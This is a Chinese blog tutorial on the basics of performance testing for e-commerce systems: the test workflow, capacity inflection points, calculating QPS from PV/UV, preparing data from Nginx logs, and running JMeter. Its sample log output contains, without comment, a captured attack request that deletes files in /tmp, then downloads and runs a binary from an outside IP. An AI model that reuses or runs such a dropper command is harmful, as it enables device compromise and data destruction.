实战 | 电商业务的性能测试(一): 必备基础知识

简介: 实战 | 电商业务的性能测试(一): 必备基础知识

1.1 测试步骤总览

需求分析与测试设计(性能需求目标+业务模型拆解)

测试数据准备和构造(基于模型的数据准备)

性能指标预期(性能需求目标)

发压工具配置及脚本编写(压力策略)

测试过程(预计的前置准备过程和压测时间点规划)

结果分析与测试报告

1.2 测试模型分析

如下的测试模型来简单的说明测试中需要关注的点和测试的目的


字段说明

1、横轴 : 代表并发数,也就对应着Jmeter里面的线程数

2、Utizilation(U) :资源利用率

3、Throughput(X): 吞吐量,对应QPS或TPS

4、ResponseTime® :响应时间

拐点 分析:

第一条虚线处的拐点代表着随着并发数的增加,资源利用率(CPU资源等)和吞吐量也在伴随着递增, 这个时候我们的响应时间有小幅度的增加,但是在可接受的范围之内;在这个点是做容量规划最好的参考点

第二条虚线处的拐点表示随着并发数的继续增加,系统资源已经到达了瓶颈,吞吐量开始明显下降,响应时间会大幅增加,也就是说已经到达了性能的瓶颈,请求队列开始挤压,这个时候已经严重影响用户体验或者有系统崩溃的风险。

2.1 需求分析与测试设计

此处从性能需求目标与业务模型拆解两方面着手,

1、目标场景分类:

  • 新上线系统性能测试:要求容量测试,系统最大容量
  • 系统升级类性能测试:和基线版本对比,性能不下降
  • 新系统性能优化测试:伴随调优目标的性能测试

注:在后面的演示中,会以新系统上线的容量测试为例,目标为获取系统最大容量

字段说明:

基准测试:见下图,我的理解就是性能测试,找到最优的QPS(TPS)点



容量测试 :见下图,我的理解为压力测试,在达到性能瓶颈后继续加压,测试系统的最大承载量



新系统想要确定测试基准,就需要拿到数据,而产品一般是不会直接告诉我们QPS 的,产品会告诉我们 PV/UV 天。

根据 PVUV 再结合业务场景来计算确认我们的测试需求;将其转化为小时或分钟,或秒;另外业务场景可能会几种在某个时间段,比如工作日的8个小时时间:

UV :或者外卖产品则集中在午饭和晚饭的2个小时时间段,假如UV 为1000w/天,那么高峰时段占了总用户数的80%:

1000w * 80% / (4*3600) = 每秒的并发用户数

PVPV 可以直接对应到QPS指标,好比一个电商产品,产品分别给出了首页、商品页、订单页的PV,便可依此来进行性能测试的基准设计。如果粗略的按24小时算QPS的话就是QPS = PV(天)/24/3600

2、根据具体的性能测试需求,确定测试类型以及压测的模块(web/mysql/redis/系统整体)

3、前期要与相关人员充分沟通,初步确定压测方案及具体性能指标

4、QA完成性能测试设计后,需产出测试方案文档发送邮件到项目组,并且再次与相关人员沟通(或者组织性能测试评审),确认是否满足需求

2.2、测试数据准备和构造

数据的准备可以如下几点:

1、接口请求参数:自己构造、日志获取、上下关联

  • 自己构造 :自己抓包等,这个有个问题就是后端可能有缓存而造成对实际压力程度的影响
  • 日志获取:推荐常用,通过日志或数据库获取大批量的数据然后打散

例如,我们的请求是通过Nginx转发的,那么可以通过Nginx的日志来获取请求数据,现有如下的log:


现在我们可以利用Linux 三剑客中的awk 命令配合上排序的shell命令对log进行提取过滤,找出访问量最高的请求:

$ cat access.log | awk '{print $7}' | sort | uniq -c | sort -nr | head -15
4709 /sso/register
4703 /sso/login
157 400
139 /
8 http://www.baidu.com/cache/global/img/gs.gif
5 /index.php
4 mstshash=Administr"
4 /license.txt
4 ip.ws.126.net:443
4 "
2 /sso/getAuthCode?telephone=17138134641
2 /sso/getAuthCode?telephone=17127460936
2 /shell?cd+/tmp;+rm+-rf+*;+wget+http://45.148.10.194/arm7;+chmod+777+arm7;+./arm7+rep.arm7
2 /robots.txt
2 /phpmyadmin/
  • 上下关联:

有些数据我们是无法提前获取的,好比用户的订单数据和购物车数据,这些需要用户下单后生成,因此就需要在下单接口后通过上下关联的接口返回值来获取

2、数据表的数据填充

可以利用jmeter的高并发通过接口来提前创建数据

3、如果是多接口,则需要结合业务场景设计请求比例

比如用户浏览主页的PV和浏览商户的比例为1:2,那么接口的比例设计也就按照1:2来设计。

2.3、性能指标预期

  • 1.每秒请求数(QPS)
  • 2.请求响应时间(最大,最小,平均值)
  • 3.错误率
  • 4.机器性能:cpu idel30%,memory无剧烈抖动或飙升
  • 5.压测过程接口功能是否正常
  • 6.不同性能测试方式下指标预期是否有差异

2.4、发压工具配置及脚本编写

1.发压工具准备-jmeter简介

(1) 集成包,解压即可使用,Windowns, Linux, Mac通用(依赖Java环境)

(2) jmx文件为xml文件,Win,Linux环境均可运行

(3) 多线程并发

(4) 运行完脚本会生成jtl日志,可在Win、Mac环境界面中查看、统计

使用jmeter可以做到:

  • 压测场景 :单接口/复杂事物——>场景构造
  • 压力需求 :<1000QPS 或者万级以上的使用Jmeter 分布式支持的方式
  • 是否周期性 :Jmeter jmx场景文件,数据驱动,结果落库
  • 二次开发需求 :Jmeter开源插件化思想,支持Thrift
  • 协议支持 :Dubbo等多种协议,可以快速平台化
  • 问题支持 :开放社区,广泛使用

2.脚本编写

(1) HTTP

(2) 其他

3.命令启动,Jmeter 本身也是软件,也有自己的承载限制,所以真正测试过程还是要以命令行运行的方式,UI 可以作为编写和调试脚本使用

启压:./jmeter -n -t hb.jmx-l hb.jtl

2.5 测试过程

  • 1、测试前环境检查:记录机器参数
  • 2、起压:根据被压情况,调节并发量到合适情况
  • 3、查看记录各项性能指标
  • nginx 日志查看每秒请求数
  • 查看nginx 错误请求
  • 查看机器参数:cpu idel、mem
  • 查看dbcache 等数据是否写入正常
  • 访问接口,查看功能是否正常

2.6 结果分析与测试报告

1、根据测试过程中记录的各项参数,结合压测工具产生的日志,对测试结果进行分析,并产出测试报告

2、测试完成后,及时与相关人员沟通,确认是都满足需求

3、发送测试报告邮件

以上只是做了个性能测试的基础知识铺垫,后续在此理论基础上,以电商业务为背景,结合 Docker +Jmeter +Influx +Grafana完成一个实例压测与监控~


喜欢软件测试的小伙伴们,如果我的博客对你有帮助、如果你喜欢我的博客内容,请 “点赞” “评论” “收藏” 一键三连哦!更多技术文章

相关文章
|
5月前
|
数据采集 JSON JavaScript
Cypress 插件实战:让测试更稳定,不再“偶尔掉链子”
本文分享如何通过自定义Cypress插件解决测试不稳定的痛点。插件可实现智能等待、数据预处理等能力,替代传统硬性等待,有效减少偶发性失败,提升测试效率和可维护性。文内包含具体实现方法与最佳实践。
|
6月前
|
存储 关系型数据库 测试技术
玩转n8n测试自动化:核心节点详解与测试实战指南
n8n中节点是自动化测试的核心,涵盖触发器、数据操作、逻辑控制和工具节点。通过组合节点,测试工程师可构建高效、智能的测试流程,提升测试自动化能力。
|
7月前
|
Web App开发 人工智能 JavaScript
主流自动化测试框架的技术解析与实战指南
本内容深入解析主流测试框架Playwright、Selenium与Cypress的核心架构与适用场景,对比其在SPA测试、CI/CD、跨浏览器兼容性等方面的表现。同时探讨Playwright在AI增强测试、录制回放、企业部署等领域的实战优势,以及Selenium在老旧系统和IE兼容性中的坚守场景。结合六大典型场景,提供技术选型决策指南,并展望AI赋能下的未来测试体系。
|
7月前
|
存储 人工智能 算法
AI测试平台实战:深入解析自动化评分和多模型对比评测
在AI技术迅猛发展的今天,测试工程师面临着如何高效评估大模型性能的全新挑战。本文将深入探讨AI测试平台中自动化评分与多模型对比评测的关键技术与实践方法,为测试工程师提供可落地的解决方案。
|
5月前
|
人工智能 自然语言处理 JavaScript
Playwright MCP在UI回归测试中的实战:构建AI自主测试智能体
Playwright MCP结合AI智能体,革新UI回归测试:通过自然语言驱动浏览器操作,降低脚本编写门槛,提升测试效率与覆盖范围。借助快照解析、智能定位与Jira等工具集成,实现从需求描述到自动化执行的闭环,推动测试迈向智能化、民主化新阶段。
|
7月前
|
人工智能 缓存 测试技术
Playwright进阶指南 (6) | 自动化测试实战
2025企业级测试解决方案全面解析:从单元测试到千级并发,构建高可用测试体系。结合Playwright智能工具,解决传统测试维护成本高、环境依赖强、执行效率低等痛点,提升测试成功率,内容从测试架构设计、电商系统实战框架、高级测试策略、Docker化部署、CI/CD集成及AI测试应用,助力测试工程师掌握前沿技术,打造高效稳定的测试流程。
Playwright进阶指南 (6) | 自动化测试实战
|
6月前
|
人工智能 数据可视化 测试技术
AI 时代 API 自动化测试实战:Postman 断言的核心技巧与实战应用
AI 时代 API 自动化测试实战:Postman 断言的核心技巧与实战应用
788 11
|
7月前
|
算法 测试技术 API
从自学到实战:一位测试工程师的成长之路
在技术快速发展的今天,自动化测试已成为提升职场竞争力的关键技能。本文讲述了一位测试工程师从自学到实战的成长之路,分享他在学习UI、APP和API自动化过程中遇到的挑战,以及如何通过实际项目磨炼技术、突破瓶颈。他从最初自学的迷茫,到实战中发现问题、解决问题,再到得到导师指导,逐步掌握测试开发的核心思维,并向测试平台建设方向迈进。文章总结了他从理论到实践、从执行到思考的转变经验,强调了实战、导师指导和技术服务于业务的重要性。最后,邀请读者分享自己的技术突破故事,共同交流成长。
|
7月前
|
资源调度 前端开发 JavaScript
Jest 测试实战指南
本文系统讲解如何使用 Jest 进行高效的 JavaScript 函数测试,涵盖环境搭建、测试用例编写、模拟函数与快照测试等内容,帮助开发者提升代码质量与测试效率。
251 0
|
7月前
|
人工智能 缓存 监控
大模型性能测试实战指南:从原理到落地的全链路解析
本文系统解析大模型性能测试的核心方法,涵盖流式响应原理、五大关键指标(首Token延迟、吐字率等)及测试策略,提供基于Locust的压测实战方案,并深入性能瓶颈分析与优化技巧。针对多模态新挑战,探讨混合输入测试与资源优化